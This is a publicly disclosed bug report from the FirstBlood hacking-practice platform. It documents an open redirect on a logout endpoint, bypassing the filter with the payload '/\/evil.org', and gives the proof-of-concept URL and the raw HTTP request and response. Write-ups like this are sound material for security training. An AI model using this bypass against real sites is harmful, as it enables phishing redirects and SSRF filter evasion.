Open redirect at http://firstbloodhackers.com:49330/drpanel/logout.php

FirstBlood-#92 — Open redirect at http://firstbloodhackers.com:49330/drpanel/logout.php
This issue was discovered on FirstBlood v1

This report has been reviewed and accepted as a valid vulnerability on FirstBlood!

On 2021-05-10, 0xconft Level 5 reported:


Hi there,
I found an open redirect on your website at /drpanel/logout.php endpoint on ref parameter. There's filter in place where it must start with / and also // is filtered but i end up bypassing this with this payload "/\/evil.org" which will be reflected as "//evil.org" at location header thus will redirect victim to evil.org. An example of impact caused by this vulnerability is this vulnerability can be combined with SSRF attack to bypassing filter or it can be used for phising.
PoC
http://firstbloodhackers.com:49330/drpanel/logout.php?ref=/\/evil.org
Request
GET /drpanel/logout.php?ref=/\/evil.org HTTP/1.1
Host: firstbloodhackers.com:49330
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate  
Connection: close
Referer: http://firstbloodhackers.com:49330/drpanel/index.php
Cookie: drps=5a5cfb7c6047d6dc8dbc411b2
Upgrade-Insecure-Requests: 1

Response
HTTP/1.1 302 Found
Server: nginx
Date: Mon, 10 May 2021 06:19:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: //evil.org
Content-Length: 0

This report has been publicly disclosed for everyone to view

P4 Low

Endpoint: /drpanel/logout.php

Parameter: ref

Payload: /\/evil.org

FirstBlood ID: 1
Vulnerability Type: Open Redirect

There is an open url redirect vulnerability on /logout.php. The code expects it to start with / and does not allow to redirect to external domains but this can be bypassed.

BugBountyHunter